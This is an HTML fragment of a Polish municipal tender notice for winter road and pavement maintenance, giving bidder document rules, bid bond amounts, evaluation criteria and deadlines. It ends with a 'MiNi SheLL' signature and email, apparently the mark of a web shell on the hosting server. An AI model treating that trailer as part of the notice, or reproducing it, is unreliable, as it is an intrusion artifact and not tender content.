                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px"></div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br /><br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">5.3	Jeżeli Wykonawca wykazując spełnianie warunku, o którym mowa w art. 22 ust. 1b pkt 3 Ustawy, będzie polegać na zasobach podmiotów na zasadach określonych w art. 22a Ustawy, Wykonawca zobowiązany jest przedłożyć:
5.3.1	wraz z ofertą:
1)	w celu oceny, iż będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący Wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, winien przedstawić w szczególności pisemne zobowiązanie tych podmiotów bądź inny dokument (przedstawione w oryginale), zawierające informacje w zakresie określonym w §9 ust. 1 Rozporządzenia Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia.
Wzór treści zobowiązania stanowi Załącznik Nr 1C do SIWZ.
2)	oświadczenie podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu, o którym mowa w pkt 5.1.1 SIWZ.
5.4	W celu potwierdzenia okoliczności, o której mowa w pkt 4.2.2 SIWZ, mając na uwadze treść art. 26 ust. 6 Ustawy, Zamawiający uzyska dokument potwierdzający brak podstaw wykluczenia Wykonawcy na podstawie art. 24 ust. 5 pkt 1 Ustawy za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne (Dz. U. z 2014 r., poz. 1114 oraz z 2016 r. poz. 352).
5.5	Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 5.4 SIWZ, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające, że nie otwarto jego likwidacji ani nie ogłoszono upadłości. Niniejszy dokument lub dokumenty powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
5.6	Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt 5.5 SIWZ, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby. Zapisy 5.5 SIWZ stosuje się.
</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />8.1	Warunkiem udziału w postępowaniu jest wniesienie wadium. Zamawiający określa wadium w poszczególnych jego częściach w sposób następujący:
8.1.1	część 1 zamówienia  kwota 5 000,00 PLN (słownie złotych: pięć tysięcy 100/00).
8.1.2	część 2 zamówienia  kwota 500,00 PLN (słownie złotych: pięćset 100/00).
8.2	Wadium musi być wniesione przed upływem terminu do składania ofert, wskazanego w punkcie 11.1 SIWZ.
8.3	Wadium może być wnoszone w następujących formach: 
8.3.1	pieniądzu, 
8.3.2	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
8.3.3	gwarancjach bankowych, 
8.3.4	gwarancjach ubezpieczeniowych,
8.3.5	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2  ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804 ze zm.).
8.4	Jeżeli wadium zostanie wniesione w pieniądzu to należy je wpłacić przelewem na rachunek bankowy Zamawiającego: 
Getin Noble Bank S.A.: 06 1560 0013 2226 4983 1000 0003.
Wykonawca powinien dołączyć do oferty kserokopię wniesienia wadium z potwierdzeniem dokonanego przelewu. Na poleceniu przelewu należy wpisać: 
Wadium  przetarg nr ZP.272.17.2016  część  zamówienia
W pozostałych przypadkach wymagane jest dołączenie oryginału dokumentu wystawionego na rzecz Zamawiającego, który należy złożyć łącznie z ofertą. Dokumenty potwierdzające wniesienie wadium, o których mowa w punkcie 8.3 SIWZ muszą zachowywać ważność przez cały okres, w którym Wykonawca jest związany ofertą.
8.5	W przypadku wnoszenia wadium w formie innej niż w pieniądzu, w treści tego dokumentu powinno znaleźć się, co następuje:
1)	treść art. 46 ust. 4a i 5 Ustawy, określająca okoliczności zatrzymania wadium przez Zamawiającego,
2)	jednoznaczny zapis o gwarantowaniu wypłaty należności w sposób nieodwołalny, bezwarunkowy i na pierwsze żądanie,
3)	gdy oferta zostanie złożona przez podmioty wspólnie ubiegające się o udzielenie zamówienia (np. konsorcjantów)  informacja identyfikująca podmioty, których dotyczy zabezpieczenie wadialne oferty.
Brak którejś z powyższych adnotacji w treści dokumentu wadialnego, będzie skutkować odrzuceniem oferty w trybie art. 89 ust. 1 pkt 7b Ustawy, to jest z uwagi na wniesienie wadium w sposób nieprawidłowy.
8.6	W przypadku wnoszenia wadium przelewem na rachunek bankowy, o jego wniesieniu w terminie decydować będzie data wpływu środków na rachunek bankowy Zamawiającego wskazany w punkcie 8.4 SIWZ.
8.7	Okoliczności i zasady zwrotu wadium, jego przepadku określa Ustawa. 
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>termin płatności</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Wszystkie zmiany i uzupełnienia treści niniejszej umowy wymagają dla swej ważności formy pisemnej.
2. 	Umowa będzie mogła zostać zmieniona w następującym zakresie:
a) 	możliwa jest zmiana umowy w zakresie kluczowego personelu Wykonawcy i Zamawiającego - w szczególności osób nadzorujących prowadzenie prac;
b)	możliwa jest zmiana wynagrodzenia w przypadku konieczności zmiany kwoty podatku VAT, w związku ze zmianą powszechnie obowiązujących przepisów prawnych, w szczególności przepisów podatkowych dotyczących obowiązującej stawki podatku VAT;
c)	w przypadku ostrego ataku zimy i konieczności zwiększenia przedmiotowego zakresu usług, możliwe będzie udzielenie dodatkowych usług na podstawie art. 144 ust. 1 pkt 2 Pzp.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 18/11/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>zimowe utrzymanie jezdni<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b><br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>zimowe utrzymanie chodników<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b><br /><b>2) Wspólny Słownik Zamówień (CPV): </b><br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b><br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td></td><td></td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com